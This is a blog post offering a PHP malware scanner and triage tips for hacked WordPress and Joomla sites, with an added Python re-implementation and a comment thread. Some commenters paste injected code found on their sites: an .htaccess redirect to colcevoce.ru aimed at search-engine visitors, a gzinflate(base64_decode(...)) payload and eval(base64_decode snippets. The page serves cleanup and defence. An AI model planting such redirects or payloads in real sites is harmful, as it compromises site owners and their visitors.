WordPress Hack: Malware Scanner

This malware scanner script walks a site's files and flags those that contain code typical of PHP malware. It returns a list of possibly infected files; each entry carries a label (eval, c99madshell or long_text) and a short portion of the matched code. The three patterns it looks for are a call to eval(…), the header <?php $md5="…"; $wp_salt="…"; … used by the c99madshell backdoor, and a long_text: a long unbroken run of base64-like characters such as "FEKS2121asFklMn83kUgdlf/sDkn12L+…", which is how injected payloads are usually stored. All three are common in obfuscated malware, but none of them is proof of infection on its own, which is why the script reports rather than removes.

When the scan is done, double-check the results before acting on them. Do not delete or clean flagged files immediately: the script reports any file containing one of the three patterns, and clean files use eval() too, JavaScript in particular (see the first sample result below). Open each flagged file, look at the matched code in context, and for an eval(base64_decode("…")) payload decode the string rather than run it. So please be careful.

Below are the sample results:

1. ./website.com/wp-includes/js/tw-sack.dev.js – eval – eval(this.response

  • File – ./website.com/wp-includes/js/tw-sack.dev.js
  • Label – eval
  • Small portion of matched code – eval(this.response
  • Not malicious: a legitimate eval() in a WordPress core script under wp-includes

2. ./website2.com/system/libs/65d1.php – long_text – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr

  • File – ./website2.com/system/libs/65d1.php
  • Label – long_text
  • Small portion of matched code – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
  • I checked the file and confirmed it is malicious.
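As an added example (my own code, not the page's scanner_2.6.php), here is a Python re-implementation of the three heuristics described above, plus a one-layer base64 decode for triaging an eval(base64_decode("…")) hit without executing it. The regexes are my reconstruction from the labels and sample matches on this page and are an assumption; the sample files are constructed here, and the two truncated snippets are the ones quoted in the comment thread further down.

```python
"""Added example, not the page's scanner_2.6.php: a Python re-implementation of the
three heuristics the post describes (eval, c99madshell, long_text), plus a one-layer
base64 decode so an eval(base64_decode("...")) hit can be triaged without running it.
The regexes are my reconstruction (assumption) from the labels and sample matches."""
import base64
import binascii
import os
import re
import tempfile

SNIPPET_LEN = 40  # like the page, print only a portion of each match

# Label -> pattern; a file can carry several labels.
PATTERNS = {
    # eval( in PHP or JS. The page warns this also fires on legitimate files.
    "eval": re.compile(r"\beval\s*\("),
    # The c99madshell header the page quotes: <?php $md5="..."; $wp_salt="..."; ...
    "c99madshell": re.compile(r'<\?php\s+\$md5\s*=\s*"[^"]*";\s*\$wp_salt\s*=\s*"[^"]*";'),
    # A long unbroken base64-alphabet run, as in the page's long_text sample.
    "long_text": re.compile(r"[A-Za-z0-9+/]{50,}"),
}

# eval(base64_decode("...")) with the payload captured. No closing quote is required,
# so the scanner's truncated snippets can be fed in as well as whole files.
EVAL_B64 = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)""")


def scan_text(text):
    """Return [(label, snippet), ...] for every heuristic that fires on text."""
    hits = []
    for label, pattern in PATTERNS.items():
        m = pattern.search(text)
        if m:
            hits.append((label, text[m.start():m.start() + SNIPPET_LEN].split("\n")[0]))
    return hits


def scan_tree(root, extensions=(".php", ".js", ".txt", ".htaccess")):
    """Walk root and return {relative path: hits} for files with at least one hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:  # latin-1 never fails on odd bytes
                hits = scan_text(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def decode_layer(payload):
    """Decode one base64 layer for triage. A truncated payload is re-padded instead
    of rejected, so a cut-off snippet still shows what the payload starts with."""
    body = payload.rstrip("=")
    try:
        return base64.b64decode(body + "=" * (-len(body) % 4)).decode("latin-1")
    except (binascii.Error, ValueError):
        return ""


def triage_eval_b64(text):
    """Decoded first layer of every eval(base64_decode("...")) in text. If a result
    itself starts with eval(base64_decode(, there is another layer: decode again,
    never eval() it."""
    return [decode_layer(m.group(1)) for m in EVAL_B64.finditer(text)]


# Constructed sample site (not from any real host): a legitimate JS file that trips
# the eval heuristic, a PHP file with a two-layer payload, and a harmless text file.
INNER = '$ip=$_SERVER["REMOTE_ADDR"];'
OUTER = 'eval(base64_decode("%s"));' % base64.b64encode(INNER.encode()).decode()
SAMPLE_FILES = {
    "wp-includes/js/sack.js": "function x(r){ eval(this.response); }\n",
    "index.php": '<?php eval(base64_decode("%s")); ?>\n'
                 % base64.b64encode(OUTER.encode()).decode(),
    "wp-content/readme.txt": "plain text, nothing suspicious here\n",
}

# Truncated matches quoted in the page's comment thread, reused as triage input.
PAGE_SNIPPETS = [
    'eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF',
    "eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU",
]


def demo():
    """Write the sample site to a temp dir, scan it, and return the findings."""
    root = tempfile.mkdtemp()
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return scan_tree(root)


if __name__ == "__main__":
    for i, (path, hits) in enumerate(demo().items(), 1):
        print("%d. ./%s" % (i, path))
        for label, snippet in hits:
            print("   -%s - %s" % (label, snippet))
    for snippet in PAGE_SNIPPETS + [SAMPLE_FILES["index.php"]]:
        print("layer 1:", triage_eval_b64(snippet))
```

Run it with python3 and it prints findings in the same one-line-per-file shape as the page's log. A decoded layer that begins with eval(base64_decode( means the payload is nested, so decode again rather than execute; the first page snippet decodes to exactly that, and the second to the start of an IP-logging injection. A match is still only a lead: the first sample result above shows a clean core file tripping the eval rule, so compare flagged core, theme and plugin files against a fresh copy of the same version before deleting anything.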

Download Malware Scanner
To use the script, upload it to the top of the site you want scanned and either open it in a browser or, preferably, run it from the command line in that directory (a browser run on a large site often hits the PHP execution time limit and shows a truncated or empty page):

$ time php scanner_2.6.php >> scanner_log 2>&1 | tail -f scanner_log

This runs scanner_2.6.php, appends its output to scanner_log (the redirections are ordered so that PHP warnings on stderr land in the log as well, not only the file list), and follows the log as it grows; press Ctrl-C once the scan has finished. Keep scanner_log, as it is what you read, or send, when triaging the results. Remove scanner_2.6.php from the web root afterwards: anyone who can reach its URL can run it and read the path listing it produces.

scanner_2.6.zip (3 kB)


52 Responses to WordPress Hack: Malware Scanner

  1. Anthony says:

    Hi Paolo

    First up, thanks for your great work with this script.

    When I run it via command line or browser, I get this:

    ../infected/
    ################################################################################

    Found Files
    Summary. You can take a better look on files that matches a potential hack script.

    Then in my error log I see:

    [28-Feb-2012 20:41:34] PHP Warning: opendir(../infected/) [function.opendir]: failed to open dir: No such file or directory in /*****/*****/public_html/barcodeinfo/scanner_2.3.php on line 83
    [28-Feb-2012 20:41:35] PHP Warning: Invalid argument supplied for foreach() in /***/*****/public_html/barcodeinfo/scanner_2.3.php on line 57

    Any ideas?

    thanks
    Anthony

    • Paolo says:

      Oh! Sorry about that Anthony, I have fixed it: I changed $root to "./" on line 25.

      Let me know your thoughts about the scanner. Thanks for using it.

      Regards,
      Paolo

  2. Brian says:

    Paolo

    I have some malware issues going on but I’m not sure how to fix. I run the cleaner and it works but the malware returns again so I don’t think that I’m getting to the root of the issue. I ran the scanner but am not sure what I’m looking for. Can you please help or point me in the right direction?

    These are always the infected files found by the cleaner
    ./index.php
    ./wp-admin/index.php
    ./wp-content/index.php

    http://ericpostonline.com/scanner_2.3.php

    • Paolo says:

      Hi Brian,

      We need to find the script that creates the malware code.
      The scan result can help me find it.

      I’ll run the scanner on your site and check the result.

      I'll let you know.

      Paolo

  3. Die2mrw007 says:

    Great work Paolo… This is a really useful plugin :)
    The best one indeed.

  4. Rulex says:

    The scanner code is not working for me. It sits there for a while like it is doing something, but after a while it says the server is busy.

    Total newb here, pls be patient :)

    And thank you very much for this!

    • Paolo says:

      Hello Rulex,

      Thanks for using my code. Can you check if there's a scanner_log in the directory where scanner_2.4.php is located?
      Actually, the scanner should output directories or files as it scans your server.
      If it doesn't, try this command:

      $ time php scanner_2.4.php 2>&1 >> scanner_log | tail -f scanner_log

      Also, when it's done, can you send the scanner_log to info@php-beginners.com? As of now I am the only one who can
      understand the scanner_log, but I am still working on upgrading it.

      Let me know. Thanks.

      Paolo

  5. teresa says:

    Hi Paolo,

    I ran the script on my site and am having the same issue as the guy above. I don't know what I am looking for and am not sure if the malware is cleaned, because the malware is still on the site. Here is the site

    http://thelauryndoll.com/scanner_2.4.php. I will email you as well. Thanks.

    • Paolo says:

      Hello Teresa,

      Thanks for using the malware scanner. I'll run it now and see what I find.
      Thanks. I'll keep you posted.

      Regards,
      Paolo :)

    • Paolo says:

      Hi Teresa,

      I just finished running the scanner. I found these 12 suspicious files:
      2. ./wp-signup.php
      -eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF

      76. ./wp-content/themes/headway/library/api/api-child-theme.php
      -eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF

      108. ./wp-content/themes/DailyNotes/page-gallery.php
      -timthumb vulnerability – timthumb

      109. ./wp-content/themes/DailyNotes/changelog.txt
      -timthumb vulnerability – timthumb
      -timthumb vulnerability – Timthumb

      110. ./wp-content/themes/DailyNotes/page-template-portfolio.php
      -timthumb vulnerability – timthumb

      111. ./wp-content/themes/DailyNotes/single.php
      -timthumb vulnerability – timthumb

      112. ./wp-content/themes/DailyNotes/page-blog.php
      -timthumb vulnerability – timthumb

      115. ./wp-content/themes/DailyNotes/epanel/custom_functions.php
      -timthumb vulnerability – timthumb

      120. ./wp-content/themes/DailyNotes/includes/entry.php
      -timthumb vulnerability – timthumb

      121. ./wp-content/themes/DailyNotes/includes/entry2.php
      -timthumb vulnerability – timthumb

      122. ./wp-content/themes/DailyNotes/includes/functions/troubleshooting.php
      -timthumb vulnerability – timthumb
      -timthumb vulnerability – Timthumb

      123. ./wp-content/themes/DailyNotes/includes/functions/installation.php
      -timthumb vulnerability – TimThumb

      I really got the feeling that the main malware script is in ./wp-signup.php
      Please send the files to me at info@php-beginners.com

      Let me know. Thanks.

      Paolo :)

  6. Cesar says:

    Hi Paolo, can I use the script to scan a Joomla website?
    Thank you.
    Cesar

    • Paolo says:

      Yes Cesar, you can use it on Joomla, just send me the scan result if you don’t know how to read it.

      Thanks for using it.

      Paolo :)

  7. wayne says:

    I don’t know anything about php and would like to use this scanner. I know basic WP installs but that is it. My sites have been hit with a JS Redirect trojan. My host company found malware on a few sites and cleaned those. I’m blocked by my antivirus from visiting a couple other sites still. Do you have steps for a complete newb on how to use your scanner?

    Thanks,
    Wayne

    • Paolo says:

      Hi Wayne,

      I'll create one for you Wayne, don't worry.
      What hosting are you using? What's your website URL?
      Can you access your server using "Shell Access"? If you
      don't have it, please ask your hosting support about
      "Shell Access".

      I'll keep you posted.

      Thanks.
      Paolo :)

  8. Pingback: WordPress Hack : Malware Scanner | Komputer, Internet, Software Tips

  9. Sandman77 says:

    Thanks for the script but I get timeouts :( I am on Dreamhost.com but live in Germany…

    http://www.nowayland.com/cleaner28.php
    http://www.nowayland.com/scanner26.php

    I have 5 WordPress sites on there and one redirects ONLY in Safari, oddly… Can you help? I have reinstalled WordPress but not removed old themes or old plugins, but updated most…

  10. Enric says:

    Hi Paolo, thanks for the great work.
    Is it possible to run the script on a Drupal installation?
    Let me explain my scenario :) . I've been infected through an old installation of Joomla (almost sure) that I'm not using anymore. But they infected all the Drupal installations on my server, changing the .htaccess files with the code at the end of my message.
    I ran your cleaner but about 30 min later the .htaccess had been modified again.
    Any ideas??? I've run out of them.
    Any help will be appreciated.
    P.S. Sorry for my English.
    Best regards!!

    RewriteEngine On

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]

    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]

    • Paolo says:

      Hello Enric,

      You need to find the file that is responsible for rewriting
      the malware script on your server.

      You can do it by running a malware scanner, you can download it here:
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download

      and send the scan result to me @ info@php-beginners.com.

      Paolo

      • Enric says:

        Ok, thanks Paolo,
        I'll leave the script running all night. :) . There are a lot of Drupal installations, but fortunately the problem is the same.
        I had tried to search for the f… file manually, but with no results :(
        Thanks in advance!!

        Enric

        • Sandra says:

          I had a blog where the hackers injected black hat links into my content. The links could only be seen in the code and not on the visual part of the blog. I found out it was hacked when I looked up the most used keywords in Google Webmaster Tools. I knew I never used keywords like viagra and other pharmacy products, still according to GWT they were the most used keywords on my site. I did not use the timthumb.php script, and I am not quite sure where the hackers got in. It may be that the files on the server had write access and the server was shared.

      • Enric says:

        Hi Paolo!!,
        the script is still working. A lot of directories :)
        Tomorrow I’ll send to you.
        Thanks

  11. angela says:

    Hi, Paolo,

    Thanks for the scripts. My site has been struggling with hackers for months, and I have no idea how to solve it other than to keep asking the host Q&A to restore… I guess your work can help me get rid of it completely… but the problem is the scanning runs so slowly on my computer that no result showed. Also, I believe even if the result shows, I won't be able to read it. I sincerely ask you to help me~~ Thank you…

  12. Kenneth says:

    I think my sites (22 Joomla installations on one server). I have run your cleaner and scanner. But I have a problem finding the source of my problem.

    • Paolo says:

      Hello Kenneth,

      Just send the scan logs to me. Maybe that way we can find the main malware script.

      Let me know

  13. Pinky says:

    Paolo,
    I sent you an email at info@php-beginners.com.
    I’m unable to run the scanner_2.6.php script from any browser. The email contains info that may help.

    I hope this was ok…. just desperate to fix this problem!
    Regards,
    Pinky

  14. John says:

    Hi Paolo, I've sent you an email with a scanner log. If you could help I'd really appreciate it, as this has been driving me mad for weeks.

    Best,

    John

  15. Vibha says:

    Thank you Paolo!
    I have replaced all the garbage code with your help and changed the FTP details.
    After 3-4 days this code came back again. What should I do?

    • Paolo says:

      Hi Vibha,

      Can you please try to scan your site. Download my malware scanner here:
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download

      Run and send the scan result to me at info@php-beginners.com

      Let me know. Paolo

      • Vibha says:

        Thanks for reply.

        I found this code in all index files.
        * ./wp-content/themes/twentyeleven/index.php
        -eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU
        * ./index.php
        -eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU

        And I found one cgi_bin folder under the root which has a yhqti.php file with garbage code.

        There is also one log file generated in the root because of the virus, which has the IP addresses of all visiting users.

        • Paolo says:

          ah! I see. just continue the scan and send the result to me.
          We need to find the file that is responsible for rewriting the malware code again.

  16. Viptor says:

    Hello Paolo, my site appears to have the eval64 codes in the main header. I deleted all the codes and they appeared again! I have sent the results to your email, please review the codes..

  17. tofe says:

    Hey,
    thanks for the scanner, but can't you explain how to use your scanner for people who don't know about command lines and shell whatever? Is that so difficult? What do I have to do? Upload the file and start it somehow?! How? Thank you.

  18. Abrek says:

    Hello Paolo, thanks for your program. I am having the malware problem in my WP header.php file. I cleaned it 100 times but it keeps coming back. I made a scan with your code but the result is too long and complicated, and it says 140 possible malware codes found. Is there any way that you can help me?
    Thanks

  19. Abrek says:

    I sent the mail just now. Thank you very much! :)

  20. I am now stumped. I had 3 sites hacked. I think I have 2 fixed, but on one the code in the header.php keeps coming back. I am not that good with code. The code that keeps coming back is

    #c3284d#
    echo(gzinflate(base64_decode(“JY5NDsIgEIX3Jr0DmU11U6ILFwp4CS9AKcIohYYOVm8vtbuXL+9PzCbjRIy+k5VA9kP8qd96o6Ca3ZBMGW2kbslIdt8KfGQ9WjZnI8ETTRfO+6DNC8vY5cIxdsbh7XgGFqtPwn1BIpuB1c4UAkYnQRdKwP5FfcqDzRJiBTqgixJMnVsD3qLzJOEEbMGB/KqU4NsB1R6uzU7w7an6AQ==”)));
    #/c3284d#

    I have all three programs on the site
    http://www.tenofthebest.net/scanner_2.6.php
    http://www.tenofthebest.net/cleaner-cli_2.10.php
    http://www.tenofthebest.net/cleaner_2.10.php
    the cleaner says nothing is infected but that line keeps coming back. I also have tried the scanner but am not sure what I am looking for. Everything I look at seems to belong, but I am not a coder.

    I really would appreciate if you could give me a tip on how to find the problem with the scanner because I am sure it will happen again and I will need to try and figure out how to fix on another site.

    Thanks,
    Jeff

  21. taimoor says:

    Hello Paolo,

    I have uploaded your malware scanning script on my server. My site works fine on direct access, but if I access it through a search engine it redirects to an iframed page. I had my hosting company scan it, but they failed to fix it and messed up my website's layout :(
    this is the site: http://reviewjuicers.com/scanner_2.6.php where i have added the script

  22. Jeff says:

    Hello Paolo,

    First of all, thank you for helping out so many people. I hesitate to ask for your assistance when I see how much you have already done. I’ve read through the posts above and I have a question about whether I’ve used your scripts correctly.

    My site is causing malware warnings for some of its users. I am concerned that if I don’t fix it soon that Google will blacklist it. We are a community-based photography festival in Chicago and have just launched our yearly program this week. I’m in trouble!

    I ran the scanner at http://www.filterfestival.com/scanner_2.6.php and it reported 189 suspect files. I then ran the cleaner at http://www.filterfestival.com/cleaner_2.10.php and it reported 0 infected files.

    Does this mean that your script was successful?

    Thank you again for your help.

    Jeff

  23. Chris says:

    Hi Paolo,

    First off, thanks for creating this. I have uploaded scanner_2.6.php to the root folder of my website and I get the following error when trying to run it:

    Error 355 (net::ERR_INCOMPLETE_CHUNKED_ENCODING): The server unexpectedly closed the connection.

    Can you run the scan for me or give me some pointers? Thanks in advance!

    http://www.texaselectricbroker.com/scanner_2.6.php

    Best regards,
    Chris

  24. Fernando says:

    Hello Paolo, great work with the script! I sent you an email with the log file I got from the scan… let me know if you’re available to help!
    Thanks
    Fernando

  25. Cosy says:

    Hi Paolo

    I have a few requests and need your help.

    Cosy

  26. Pingback: Automated Fix for Wordpress base64_decode Injection in PHP Files • Raymond.CC

  27. Krys says:

    I have uploaded the cleaner file into my directory using cPanel on GoDaddy/WordPress. I am not sure if uploading the file is all that I need to do, or how do I run it? I am a PHP newbie. Can you please help me? I need to fix 20 hacked sites on GoDaddy.
